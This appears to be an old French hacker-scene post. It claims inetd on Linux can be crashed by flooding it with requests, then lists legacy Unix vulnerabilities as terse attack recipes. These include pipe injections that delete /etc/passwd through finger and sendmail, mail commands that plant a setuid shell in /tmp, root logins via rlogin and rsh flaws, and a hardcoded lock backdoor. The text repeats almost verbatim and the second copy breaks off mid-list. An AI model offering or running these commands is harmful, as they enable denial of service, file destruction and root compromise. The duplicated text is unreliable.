Bonjour,
Commande : inetd
System affecté : Linux
On peut crasher un serveur Linux qui accepte les connections TCP sous inetd, par flooding de requêtes vers celui-ci. une cinquantaine de requêtes font que le serveur va refuser les connections inetd, parce que le serveur aura crashé. Ca marche pour tous les services sous inetd, donc ftpd, identd...
Voici une liste de vieux bugs ;
Operating System RVP Date Description (References)
/bin/sh 1-- 12/12/94 IFS hole, vi ()
/bin/su 1-- overwrite stack somehow? ()
/dev/fb 1-- frame buffer devices readable/writeable, ()
/dev/kmem 1-- /dev/kmem shold not be o+w ()
/dev/mem 1-- /dev/mem shold not be o+w ()
/dev/*st*, *mt* 1-- generally world readable/writeable ()
/etc 1-- rexd + MACH ? [NeXT] /etc/ g+w daemon ()
4.3 Tahoe 1-- chfn -- allows newlines/meta chars/bufsize ()
4.3 Tahoe 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:got pw ()
AIX ? 5++ setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()
AIX 2.2.1 1-- shadow password file o+w ()
AIX 3.1.5 5-- sendmail- mail to programs ()
AIX 3.2 5-- sendmail- mail to programs ()
AIX 3.2.4 5-- sendmail- mail to programs ()
AIX 3.2.5 5-- sendmail- mail to programs ()
AIX 3.X.X ??? rlogin localhost -l -froot
AIX ? 1-- * password means use root's password? ()
AIX ? 1-- rexd- any can get root access if enabled ()
Amdahl UTS 2.0 1-- NFS mountd only uses hostname ()
AT&T SVR3.2.0 1-- Bad protected mode allows root if have sh + cc ()
A/UX 2.0.1 5-- lpr -s; 1000 calls lpr re-use fname ()
A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()
A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()
BellTech SYSV386 1-- ulimit 0; passwd ==> zero's out passwd file ()
BSD 4.1 1-- Sendmail can mail directly to a file
BSD 4.1 1-- can mail directly to a file
BSD 4.1 1-- run set gid program, dump core, is set gid
BSD 4.1 1-- lock- compiled password "hasta la vista", + ^Z ()
BSD <4.2? 1-- IFS w. preserve bug in vi ()
BSD 4.1 1-- mail directly to a file ()
BSD 4.1 1-- exec sgid program, dump core, core is sgid ()
BSD 4.1 1-- Sendmail: can mail directly to a file ()
BSD 4.1 1-- lock password "hasta la vista" backdoor ()
BSD <4.2 1-- IFS w/ preserve bug w/vi ()
BSD <4.2 1-- suspend mkdir, ln file you want to dir ()
BSD <4.2? 1-- suspend mkdir, ln file you want to dir ()
BSD 4.2 1-- lock -- compiled in password "hasta la vista" ()
BSD 4.2 1-- ln passwd file to mail spool, mail to file ()
BSD 4.2 1-- can truncate read only files ()
BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2 1-- ln -s target ~/.plan; finger user to read file ()
BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()
BSD 4.2 1-- adb su; change check in memory; shell out ()
BSD 4.2 1-- race condition, can get root via "at" ()
BSD 4.2 1-- lock -- compiled in password "hasta la vista"
BSD 4.2 1-- ln passwd file to mail spool, mail user ()
BSD 4.2 1-- can truncate read only files ()
BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2 1-- ln -s target ~/.plan; finger user. ()
BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()
BSD 4.2 1-- adb su; change check in memory; shell out; su ()
BSD 4.2 1-- race condition, can get root via "at" ()
BSD 4.2 1-- /dev/kmem and /dev/mem should not be o+w ()
BSD 4.2 1-- signal any process by changing process group ()
BSD 4.3 1-- ftp -n; quote user ftp; ect. Gets root privs. ()
BSD 4.3 1-- lpd can overwrite file ()
BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell. ()
BSD 4.3 1-- fchown (2) can chown _any_ file ()
BSD 4.3 1-- race condition, get root via "at" ()
BSD 4.3 1-- passwd chokes on long lines, splits pw file ()
BSD 4.3 1-- ftp -n; quote user ftp; cd ~root, get root ()
BSD 4.3 1-- lpd can overwrite file ()
BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell ()
BSD 4.3 1-- fchown (2) can chown _any_ file ()
BSD 4.3 1-- race condition (expreserve?), root via "at" ()
BSD 4.3 1-- passwd chokes on long lines, splits pw file ()
BSD 4.3 5-- lpr -s; 1000 calls lpr re-use fname ()
BSD NET/2 5-- rdist(1) uses popen(3), IFS spoof ()
BSD NET/2 5-- lpr -s; 1000 calls lpr re-use fname ()
BSD ? 1-- Overwrite gets buffer -- fingerd, etc
BSD ? 1-- uudecode alias can overwrite root/daemon files ()
BSD ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()
BSD ? 1-- rwall bug ()
BSD ? 1-- adb the running kernel, shell out and get root ()
BSD ? 1-- sendmail can mail non-root file, try twice ()
BSD ? 1-- rshd -- spoof via nameservice, rsh target -l uid
BSD386 1-- mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
buffer overrun 1-- chfn ()
chfn, chsh 1-- used to create a root account ()
chmod 1-- Incorrect file or directory permissions ()
comsat 1-- running as root, utmp o+w, writes to files ()
core 1-- will system dump a setgid core image? ()
decode 1-- decode mail alias - write non-root user files ()
DellSVR3.2/1.0.6 1-- Bad prot mode allows root if have sh + cc ()
denial 1-- easy to hog processor, memory, disc, tty, etc ()
DomainO/S <=10.3 1-- break root by using s/rbak; sgid/suid ()
DomainO/S <=10.4 5-- sendmail mail to programs ()
DNS 1-- SOA can control bogus reverse ip, rhosts ()
Domain/OS <10.3 1-- break root by using s/rbak; setgid/uid ()
DYNIX 3.0.14 1-- Sendmail -C file ==> displays any file. ()
DYNIX 3.? 1-- can get root on NFS host via root via mountd ()
DYNIX 3.? 1-- on non-trusted host due to bug in mount daemon ()
DYNIX ? 1-- rsh <host> -l "" <command> runs as root ()
DYNIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
elm 5-- ELM's autoreply can be used to get root ()
expreserve 1-- can be a huge hole ()
ESIX Rev. D 1-- Bad protected mode allows root if sh+cc ()
file mod test 1-- test file doesnt lose the suid when modified ()
fsck 1-- lost+found should be mode 700 ()
ftpd 1-- static passwd struct overwrite, wuftp < x.xx ()
ftpd 4.2 1-- userid not reset properly, "user root" ()
ftpd ? 1-- core files may contain password info ()
fchown 1-- test for bad group test ()
ftruncate 1-- can be used to change major/minor on devices ()
fingerd 1-- .plan hard-links - read files, fingerd ()
gopher 6-- Type=8 Name=shell Host=;/bin/sh Port= Path= ()
gnuemacs 1-- emacsclient/server allows access to files. ()
GN <1.19 4+- exec0::/path/prog?var=blah%0Ahack-coomands0%A ()
HDB 1-- nostrangers shell escape ()
HDB 1-- changing the owner of set uid/gid files ()
HDB 1-- meta escapes on the X command line ()
HDB 1-- ; breaks on the X line ()
hosts.equiv 1-- default + entry ()
hosts.equiv 1-- easy to spoof by bad SOA at remote site ()
HPUX <7.0 1-- chfn -- allows newlines, etc ()
HP-UX 1-- sendmail: mail directly to programs ()
HPUX A.09.01 1-- sendmail: mail directly to programs ()
HPUX ? 1-- Sendmail: versions 1.2&13.1 sm, -oQ > ()
IDA 1.4.4.1 1-- :include:/some/unreadable/file in ~/.forward ()
ICMP 4-- various icmp attacks possible ()
ICMP 1-- ICMP redirect packets change non-static routes ()
Interactive 2.x 1-- Bad protected mode allows root if sh+cc ()
IRIX 3.3 1-- any user can read any other user's mail. ()
IRIX 3.3.1 1-- any user can read any other user's mail. ()
IRIX 3.3/3.31 1-- sendmail- any user can read other user's mail ()
IRIX 4.0.X 1-- default suid scripts ()
IRIX 4.0.X 1-- various $PATH problems ()
IRIX 4.0.X 1-- sendmail race condition hole ()
IRIX 4.0.X 1-- lpd are vulnerable too ()
IRIX ? 1-- rsh <host> -l "" <command> runs as root ()
IRIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
IRIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
IRIX ? 1-- Overwrite gets buffer -- fingerd, etc ()
IRIX ? 1-- uudecode alias can overwrite root/daemon files ()
IRIX ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()
IRIX ? 1-- rwall bug ()
IRIX ? 1-- adb the running kernel, shell out and get root ()
IRIX ? 1-- mail to any non-root owned file, try twice ()
IRIX ? 1-- rshd- spoof via dns - rsh target -l uid ()
IRIX ? 1-- xwsh log hole? (yo)
kernel 1-- Race conditions coupled with suid programs ()
lock 1-- 4.1bsd version had password "hasta la vista" ()
lost+found 1-- lost+found should be mode 700 ()
lpd 1-- overwrite files with root authority ()
lpr 1-- lpr -r access testing problem ()
lpr 5-- lpr -s; 1000 calls lpr re-use fname ()
lprm 1-- trusts utmp ()
mount 1-- "mount" should not be +x for users. ()
mqueue 1-- must not be mode 777! ()
movemail 1-- worm? ()
Microport 3.0 1-- ulimit 0; passwd ==> zero's out passwd file ()
network 1-- BSD network security based on "reserved ports" ()
news 1-- news receivers may execute shell commands ()
network 1-- kerberos ()
network 1-- Networks are usually very insecure. ()
NFS 1-- Many systems can be compromised with NFS/RPC. ()
NFS 1-- proxy rpc can read remote nfs files ()
NFS 1-- can generate NFS file handles ()
NFS 1-- mount disk, make cd .. and no restricted directories
OSF/1 1.2 1-- write allows shell outs to gain egid term ()
OSF/1 1.3 1-- write allows shell outs to gain egid term ()
OSF/1 1.2 1-- doesn't close the fd to the term writing to ()
OSF/1 1.3 1-- doesn't close the fd to the term writing to ()
passwd 1-- fgets allows entries mangled into ::0:0::: ()
passwd 1-- fred:...:...:...:Fred ....Flintstone::/bin/sh ()
passwd 1-- IDs shouldnt contain: ;~!` M- spoof popen ()
portmap 1-- binding problems... ()
root 1-- ? (fingerd_test.sh)
rcp 1-- nobody problem ()
rexd 1-- existence ()
rexd 1-- MACH ? [NeXT] /etc/ g+w daemon ()
rdist 1-- buffer overflow ()
rdist 5-- rdist(1) uses popen(3), IFS spoof ()
RISC/os 4.51? 1-- rsh <host> -l "" <command> runs as root ()
RPC 1-- Many systems can be compromised with NFS/RPC. ()
rwall 1-- running as root, utmp o+w , writes to files ()
SCO 3.2v4.2 5-- rdist(1) uses popen(3), IFS spoof ()
SCO ? 1-- rlogin to any acct to trusted host w/o pwd ()
SCO ? 1-- rlogin to any acct from trusted host w/o pwd ()
selection_svc 1-- allowed remote access to files ()
sendmail <x.x 1-- -bt -C/usr/spool/mail/user - reads file ()
sendmail <5.57 1-- from:<"|/bin/rm /etc/passwd"> && bounce mail ()
sendmail <=5.61 1-- can mail to any file not root owned, try twice ()
sendmail <5.61 1-- sendmail- groups incorrectly, get group ()
sendmail >5.65 1-- can get daemon privalages via .forward. ()
sendmail ? 5++ can mail to programs (sendmal1, nmh, smail)
sendmail ? 1-- debug option ()
sendmail ? 1-- wizard mode ()
sendmail ? 1-- TURN command allows mail to be stolen ()
sendmail ? 1-- decode mail alias - write non-root user files ()
sendmail ? 1-- buffer overflow cause sendmail deamon lock up ()
sendmail ? 1-- what uid does |program run with? ()
SIGNALS 1-- signal any process by changing process group ()
Stellix 2.0? 1-- rsh <host> -l "" <command> runs as root ()
Stellix 2.0 1-- rsh <host> -l "" <command> runs as root ()
Stellix 2.1 1-- login: -r hostnameruser^@luser^@term^@ ()
suid 1-- will run .profile if linked to - , IFS ()
suid 1-- never call system(3) and popen(3) ()
suid 1-- May not expect filesize signals, SIGALRMs ()
suid 1-- no setuid program on a mountable disk ()
suid 1-- ro mounting of foreign disk may allow suid. ()
suid 1-- .plan links ()
suid 1-- /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
SunOS 3.3 1-- ftpd - userid not reset properly, "user root" ()
SunOS 3.5 1-- connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
SunOS <4.0 1-- sunview - any user can read any remote file
SunOS <4.0 1-- any user can run yp server ()
SunOS 4.0 1-- chsh -- similar to chfn ()
SunOS 386i 1-- rm logintool, hack login with adb, chmod 2750 ()
SunOS 386i/4.01? 1-- login -n root requires no password ()
SunOS 386i/4.01? 1-- login -n root (no password) ()
SunOS 4.0.1 1-- chfn buffer problems ()
SunOS 4.0.1 1-- chsh buffer problems ()
SunOS 4.0.1 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3 1-- concurrent yppasswd sessions can trash yp map ()
SunOS 4.0.3 1-- mail to any non-root owned file, try twice ()
SunOS 4.0.3 1-- rcp buffer overflow ()
SunOS 4.0.3 1-- sendmail- mail to non-root file, try twice ()
SunOS 4.0.3 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:gets PW ()
SunOS 4.0.3 1-- uucico can show ph num, login, passwd, on remote machine ()
SunOS 4.0.3 1-- ypserv sends maps to anyone w/ domain (ypsnarf)
SunOS 4.0.? 1-- anyone can restore a file over any other file. ()
SunOS 4.0.? 1-- chfn -- allows newlines, meta chars, bufsize problem. ()
SunOS 4.0.? 1-- rcp with uid -2; only from PC/NFS. ()
SunOS 4.0.? 1-- ln -s /any/suid/file -i ; -i ()
SunOS 4.0.? 1-- selection_svc can remotely grab files. ()
SunOS 4.1 1-- rshd: spoof via nameservice, rsh target -l uid ()
SunOS 4.1 1-- shared libs accept relative paths w/ suid ()
SunOS 4.1 1-- sendmail: groups incorrectly checked, can get any group ()
SunOS 4.1 1-- comsat can overwrite any file ()
SunOS 4.1.x 1-- comsat can overwrite any file ()
SunOS 4.1.x 1-- ptrace allows to become root ()
SunOS 4.1.x 1-- openlook: telnet 2000; executive,x3, run ps int ()
SunOS <4.1.1 5-- lpr -s; 1000 calls lpr re-use fname ()
SunOS 4.1.2 5-- rdist(1) uses popen(3), IFS spoof ()
SunOS ? 1-- /usr/kvm/crash allows sh escapes group kmem ()
SunOS ? 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:gets PW()
SunOS ? 1-- /dev/kmem and /dev/mem should not be o+w ()
SunOS ? 1-- rshd -- spoof via nameservice, rsh target -l uid
SunOS ? 1-- ftp -n; quote user ftp; ect. Gets root privs. ()
SunOS ? 1-- symlink .plan to target file, finger user to read. ()
SunOS ? 1-- Overwrite gets buffer -- fingerd, etc. (3.5)
SunOS ? 1-- rwall bug (<= 4.01 yes). ()
SunOS ? 1-- ptrace allows to become root ()
SunOS ? 4-- icmp errors not handled correctly ()
SunOS ? 1-- adb the running kernel, shell out and get root ()
SunOS ? 1-- ftp -n; quote user ftp; ect Gets root privs ()
SunOS ? 1-- lpd can overwrite file ()
SunOS ? 1-- the window manager can be used to read any file ()
SunOS ? 1-- rexd -- any can get root access if enabled ()
SunOS ? 1-- emacsclient/server allows access to files ()
SunOS ? 1-- openlook; telnet port 2000; executive,x3, runs PS interp
SunUS ? 1-- devinfo can be used to get group kmem ()
SunOS 5.1 1-- Symlinks are broken ()
syslogd 6-- buffer overrun, allows remote access ()
syslogd 1-- syslog messages used to overwrite any file ()
system 1-- system(3) even w/ setuid(getuid()) = IFS ()
SYSV <R4 1-- write to files; race condition w/ mkdir & ln ()
SYSV <R4 1-- expreserve problem/race condition ()
SYSV R? 1-- IFS, other environment at "login:" prompt ()
tcp/ip 1-- sequence number prediction allows spoofing ()
tcp/ip 1-- source routing make host spoofing easier ()
tcp/ip 1-- rip allows one to capture traffic more easily ()
tcp/ip 4-- various icmp attacks possible ()
tftp 1-- puts/gets -- grab files, do chroot ()
traceroute 1-- allow one to easily dump packets onto net ()
ulimit 1-- passwd(1) leaves passwd locked if ulimit set ()
Ultrix 2.0? 1-- sendmail- 1.2&13.1 sm, -oQ > can r/w any ()
Ultrix 2.0? 1-- Sendmail -C file ==> displays any file. ()
Ultrix 2.2? 1-- Sendmail -C file ==> displays any file. ()
Ultrix 2.2 1-- ln passwd file to mail spool, mail to user ()
Ultrix 2.2 1-- on a non-trusted host due to bug in mountd ()
Ultrix 2.2 1-- Sendmail: -C file ==> displays any file ()
Ultrix 2.2 1-- can get root on NFS host via root via mountd ()
Ultrix 2.2 1-- get root on host running NFS from other root ()
Ultrix 3.0 1-- lock -- compiled in password "hasta la vista" ()
Ultrix 3.0 1-- login -P progname allows run programs as root ()
Ultrix 3.0 1-- login can run any program with root privs ()
Ultrix 3.0 1-- ln -s target ~/.plan; finger user to access ()
Ultrix 3.0 1-- any user can mount any filesystem ()
Ultrix 3.0 1-- X11 doesn't clear pwds in mem; /dev/mem is o+w ()
Ultrix <3.1 1-- limit file 0; passwd -->zero's out passwd file ()
Ultrix <3.1 1-- lpd can overwrite any file (back to 2.0?) ()
Ultrix 3.1? 1-- rshd: spoof via nameservice, rsh target -l uid ()
Ultrix 3.1? 1-- allows newlines, meta chars, buffsize problem ()
Ultrix <4.1 1-- overflow RISC reg buffer, get root w/ mail ()
Ultrix ? 1-- rshd -- spoof via dns, rsh target -l uid ()
Ultrix ? 1-- ypbind takes ypset from all; spoof yp DB ()
Ultrix ? 1-- yppasswd leaves yp data files world writable ()
Ultrix ? 1-- chfn -- allows newlines, meta chars, bufsize ()
Ultrix ? 1-- ftp -n; quote user ftp; ect Gets root privs ()
Ultrix ? 1-- can change host name, mount any filesystem ()
Ultrix ? 1-- uudecode alias can overwrite root/daemon files ()
Ultrix ? 4-- ICMP not handled correctly (nuke)
Ultrix ? 1-- emacsclient/server allows access to files ()
Ultrix ? 1-- lock: password "hasta la vista" backdoor ()
Ultrix ? 1-- /dev/kmem and /dev/mem should not be o+w ()
Ultrix ? 1-- can change physical ethernet address ()
UNIX 1-- / must not be go+w ()
utmp 1-- etc/utmp o+w ? ()
utmp 1-- check to see if world writeable (rwall, comsat)
utmp 1-- syslog messages can overwrite any file ()
uucp 1-- check valid UUCP akts in the /etc/ftpusers ()
uucp 1-- echo "myhost myname">x;uucp x ~uucp/.rhosts ()
uucp 1-- uucico shows ph num, login, passwd, of remote ()
uudecode 1-- if it is setuid, may create setuid files ()
uusend 1-- uusend may call "uux" while suid to root ()
uux 1-- uusend may call "uux" while suid to root ()
X11R? 1-- snoop on keyboards and bitmaps ()
X11R3 1-- can set log on and exec (fixed in "fix-6")
X11R4 1-- can set log on and exec (fixed in "fix-6")
X11R ? 1-- snoop on keyboards and bitmaps ()
X11R5 5++ xterm can create files (xterm1__)
xhost 1-- if + , anyone can connect to X server ()
ypbind 1-- accepts ypset from anyone ()
Commande : inetd
System affecté : Linux
On peut crasher un serveur Linux qui accepte les connections TCP sous inetd, par flooding de requêtes vers celui-ci. une cinquantaine de requêtes font que le serveur va refuser les connections inetd, parce que le serveur aura crashé. Ca marche pour tous les services sous inetd, donc ftpd, identd...
Voici une liste de vieux bugs ;
Operating System RVP Date Description (References)
/bin/sh 1-- 12/12/94 IFS hole, vi ()
/bin/su 1-- overwrite stack somehow? ()
/dev/fb 1-- frame buffer devices readable/writeable, ()
/dev/kmem 1-- /dev/kmem shold not be o+w ()
/dev/mem 1-- /dev/mem shold not be o+w ()
/dev/*st*, *mt* 1-- generally world readable/writeable ()
/etc 1-- rexd + MACH ? [NeXT] /etc/ g+w daemon ()
4.3 Tahoe 1-- chfn -- allows newlines/meta chars/bufsize ()
4.3 Tahoe 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:got pw ()
AIX ? 5++ setenv SHELL=/bin/sh; crontab -e; :!/bin/sh ()
AIX 2.2.1 1-- shadow password file o+w ()
AIX 3.1.5 5-- sendmail- mail to programs ()
AIX 3.2 5-- sendmail- mail to programs ()
AIX 3.2.4 5-- sendmail- mail to programs ()
AIX 3.2.5 5-- sendmail- mail to programs ()
AIX 3.X.X ??? rlogin localhost -l -froot
AIX ? 1-- * password means use root's password? ()
AIX ? 1-- rexd- any can get root access if enabled ()
Amdahl UTS 2.0 1-- NFS mountd only uses hostname ()
AT&T SVR3.2.0 1-- Bad protected mode allows root if have sh + cc ()
A/UX 2.0.1 5-- lpr -s; 1000 calls lpr re-use fname ()
A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()
A/UX 2.0.1 5-- rdist(1) uses popen(3), IFS spoof ()
BellTech SYSV386 1-- ulimit 0; passwd ==> zero's out passwd file ()
BSD 4.1 1-- Sendmail can mail directly to a file
BSD 4.1 1-- can mail directly to a file
BSD 4.1 1-- run set gid program, dump core, is set gid
BSD 4.1 1-- lock- compiled password "hasta la vista", + ^Z ()
BSD <4.2? 1-- IFS w. preserve bug in vi ()
BSD 4.1 1-- mail directly to a file ()
BSD 4.1 1-- exec sgid program, dump core, core is sgid ()
BSD 4.1 1-- Sendmail: can mail directly to a file ()
BSD 4.1 1-- lock password "hasta la vista" backdoor ()
BSD <4.2 1-- IFS w/ preserve bug w/vi ()
BSD <4.2 1-- suspend mkdir, ln file you want to dir ()
BSD <4.2? 1-- suspend mkdir, ln file you want to dir ()
BSD 4.2 1-- lock -- compiled in password "hasta la vista" ()
BSD 4.2 1-- ln passwd file to mail spool, mail to file ()
BSD 4.2 1-- can truncate read only files ()
BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2 1-- ln -s target ~/.plan; finger user to read file ()
BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()
BSD 4.2 1-- adb su; change check in memory; shell out ()
BSD 4.2 1-- race condition, can get root via "at" ()
BSD 4.2 1-- lock -- compiled in password "hasta la vista"
BSD 4.2 1-- ln passwd file to mail spool, mail user ()
BSD 4.2 1-- can truncate read only files ()
BSD 4.2 1-- finger "string|/bin/rm -f /etc/passwd"@foo.bar ()
BSD 4.2 1-- ln -s target ~/.plan; finger user. ()
BSD 4.2 1-- lpr file; rm file; ln -s /any/filename file ()
BSD 4.2 1-- adb su; change check in memory; shell out; su ()
BSD 4.2 1-- race condition, can get root via "at" ()
BSD 4.2 1-- /dev/kmem and /dev/mem should not be o+w ()
BSD 4.2 1-- signal any process by changing process group ()
BSD 4.3 1-- ftp -n; quote user ftp; ect. Gets root privs. ()
BSD 4.3 1-- lpd can overwrite file ()
BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell. ()
BSD 4.3 1-- fchown (2) can chown _any_ file ()
BSD 4.3 1-- race condition, get root via "at" ()
BSD 4.3 1-- passwd chokes on long lines, splits pw file ()
BSD 4.3 1-- ftp -n; quote user ftp; cd ~root, get root ()
BSD 4.3 1-- lpd can overwrite file ()
BSD 4.3 1-- ln -s /any/suid/file -i ; -i Get suid shell ()
BSD 4.3 1-- fchown (2) can chown _any_ file ()
BSD 4.3 1-- race condition (expreserve?), root via "at" ()
BSD 4.3 1-- passwd chokes on long lines, splits pw file ()
BSD 4.3 5-- lpr -s; 1000 calls lpr re-use fname ()
BSD NET/2 5-- rdist(1) uses popen(3), IFS spoof ()
BSD NET/2 5-- lpr -s; 1000 calls lpr re-use fname ()
BSD ? 1-- Overwrite gets buffer -- fingerd, etc
BSD ? 1-- uudecode alias can overwrite root/daemon files ()
BSD ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()
BSD ? 1-- rwall bug ()
BSD ? 1-- adb the running kernel, shell out and get root ()
BSD ? 1-- sendmail can mail non-root file, try twice ()
BSD ? 1-- rshd -- spoof via nameservice, rsh target -l uid
BSD386 1-- mail"<u>;cp /bin/sh /tmp;chmod 6777 /tmp/sh" ()
buffer overrun 1-- chfn ()
chfn, chsh 1-- used to create a root account ()
chmod 1-- Incorrect file or directory permissions ()
comsat 1-- running as root, utmp o+w, writes to files ()
core 1-- will system dump a setgid core image? ()
decode 1-- decode mail alias - write non-root user files ()
DellSVR3.2/1.0.6 1-- Bad prot mode allows root if have sh + cc ()
denial 1-- easy to hog processor, memory, disc, tty, etc ()
DomainO/S <=10.3 1-- break root by using s/rbak; sgid/suid ()
DomainO/S <=10.4 5-- sendmail mail to programs ()
DNS 1-- SOA can control bogus reverse ip, rhosts ()
Domain/OS <10.3 1-- break root by using s/rbak; setgid/uid ()
DYNIX 3.0.14 1-- Sendmail -C file ==> displays any file. ()
DYNIX 3.? 1-- can get root on NFS host via root via mountd ()
DYNIX 3.? 1-- on non-trusted host due to bug in mount daemon ()
DYNIX ? 1-- rsh <host> -l "" <command> runs as root ()
DYNIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
elm 5-- ELM's autoreply can be used to get root ()
expreserve 1-- can be a huge hole ()
ESIX Rev. D 1-- Bad protected mode allows root if sh+cc ()
file mod test 1-- test file doesnt lose the suid when modified ()
fsck 1-- lost+found should be mode 700 ()
ftpd 1-- static passwd struct overwrite, wuftp < x.xx ()
ftpd 4.2 1-- userid not reset properly, "user root" ()
ftpd ? 1-- core files may contain password info ()
fchown 1-- test for bad group test ()
ftruncate 1-- can be used to change major/minor on devices ()
fingerd 1-- .plan hard-links - read files, fingerd ()
gopher 6-- Type=8 Name=shell Host=;/bin/sh Port= Path= ()
gnuemacs 1-- emacsclient/server allows access to files. ()
GN <1.19 4+- exec0::/path/prog?var=blah%0Ahack-coomands0%A ()
HDB 1-- nostrangers shell escape ()
HDB 1-- changing the owner of set uid/gid files ()
HDB 1-- meta escapes on the X command line ()
HDB 1-- ; breaks on the X line ()
hosts.equiv 1-- default + entry ()
hosts.equiv 1-- easy to spoof by bad SOA at remote site ()
HPUX <7.0 1-- chfn -- allows newlines, etc ()
HP-UX 1-- sendmail: mail directly to programs ()
HPUX A.09.01 1-- sendmail: mail directly to programs ()
HPUX ? 1-- Sendmail: versions 1.2&13.1 sm, -oQ > ()
IDA 1.4.4.1 1-- :include:/some/unreadable/file in ~/.forward ()
ICMP 4-- various icmp attacks possible ()
ICMP 1-- ICMP redirect packets change non-static routes ()
Interactive 2.x 1-- Bad protected mode allows root if sh+cc ()
IRIX 3.3 1-- any user can read any other user's mail. ()
IRIX 3.3.1 1-- any user can read any other user's mail. ()
IRIX 3.3/3.31 1-- sendmail- any user can read other user's mail ()
IRIX 4.0.X 1-- default suid scripts ()
IRIX 4.0.X 1-- various $PATH problems ()
IRIX 4.0.X 1-- sendmail race condition hole ()
IRIX 4.0.X 1-- lpd are vulnerable too ()
IRIX ? 1-- rsh <host> -l "" <command> runs as root ()
IRIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
IRIX ? 1-- login: -r hostnameruser^@luser^@term^@ ()
IRIX ? 1-- Overwrite gets buffer -- fingerd, etc ()
IRIX ? 1-- uudecode alias can overwrite root/daemon files ()
IRIX ? 1-- /bin/mail ; !/bin/sh Get uid=bin shell ()
IRIX ? 1-- rwall bug ()
IRIX ? 1-- adb the running kernel, shell out and get root ()
IRIX ? 1-- mail to any non-root owned file, try twice ()
IRIX ? 1-- rshd- spoof via dns - rsh target -l uid ()
IRIX ? 1-- xwsh log hole? (yo)
kernel 1-- Race conditions coupled with suid programs ()
lock 1-- 4.1bsd version had password "hasta la vista" ()
lost+found 1-- lost+found should be mode 700 ()
lpd 1-- overwrite files with root authority ()
lpr 1-- lpr -r access testing problem ()
lpr 5-- lpr -s; 1000 calls lpr re-use fname ()
lprm 1-- trusts utmp ()
mount 1-- "mount" should not be +x for users. ()
mqueue 1-- must not be mode 777! ()
movemail 1-- worm? ()
Microport 3.0 1-- ulimit 0; passwd ==> zero's out passwd file ()
network 1-- BSD network security based on "reserved ports" ()
news 1-- news receivers may execute shell commands ()
network 1-- kerberos ()
network 1-- Networks are usually very insecure. ()
NFS 1-- Many systems can be compromised with NFS/RPC. ()
NFS 1-- proxy rpc can read remote nfs files ()
NFS 1-- can generate NFS file handles ()
NFS 1-- mount disk, make cd .. and no restricted directories
OSF/1 1.2 1-- write allows shell outs to gain egid term ()
OSF/1 1.3 1-- write allows shell outs to gain egid term ()
OSF/1 1.2 1-- doesn't close the fd to the term writing to ()
OSF/1 1.3 1-- doesn't close the fd to the term writing to ()
passwd 1-- fgets allows entries mangled into ::0:0::: ()
passwd 1-- fred:...:...:...:Fred ....Flintstone::/bin/sh ()
passwd 1-- IDs shouldnt contain: ;~!` M- spoof popen ()
portmap 1-- binding problems... ()
root 1-- ? (fingerd_test.sh)
rcp 1-- nobody problem ()
rexd 1-- existence ()
rexd 1-- MACH ? [NeXT] /etc/ g+w daemon ()
rdist 1-- buffer overflow ()
rdist 5-- rdist(1) uses popen(3), IFS spoof ()
RISC/os 4.51? 1-- rsh <host> -l "" <command> runs as root ()
RPC 1-- Many systems can be compromised with NFS/RPC. ()
rwall 1-- running as root, utmp o+w , writes to files ()
SCO 3.2v4.2 5-- rdist(1) uses popen(3), IFS spoof ()
SCO ? 1-- rlogin to any acct to trusted host w/o pwd ()
SCO ? 1-- rlogin to any acct from trusted host w/o pwd ()
selection_svc 1-- allowed remote access to files ()
sendmail <x.x 1-- -bt -C/usr/spool/mail/user - reads file ()
sendmail <5.57 1-- from:<"|/bin/rm /etc/passwd"> && bounce mail ()
sendmail <=5.61 1-- can mail to any file not root owned, try twice ()
sendmail <5.61 1-- sendmail- groups incorrectly, get group ()
sendmail >5.65 1-- can get daemon privalages via .forward. ()
sendmail ? 5++ can mail to programs (sendmal1, nmh, smail)
sendmail ? 1-- debug option ()
sendmail ? 1-- wizard mode ()
sendmail ? 1-- TURN command allows mail to be stolen ()
sendmail ? 1-- decode mail alias - write non-root user files ()
sendmail ? 1-- buffer overflow cause sendmail deamon lock up ()
sendmail ? 1-- what uid does |program run with? ()
SIGNALS 1-- signal any process by changing process group ()
Stellix 2.0? 1-- rsh <host> -l "" <command> runs as root ()
Stellix 2.0 1-- rsh <host> -l "" <command> runs as root ()
Stellix 2.1 1-- login: -r hostnameruser^@luser^@term^@ ()
suid 1-- will run .profile if linked to - , IFS ()
suid 1-- never call system(3) and popen(3) ()
suid 1-- May not expect filesize signals, SIGALRMs ()
suid 1-- no setuid program on a mountable disk ()
suid 1-- ro mounting of foreign disk may allow suid. ()
suid 1-- .plan links ()
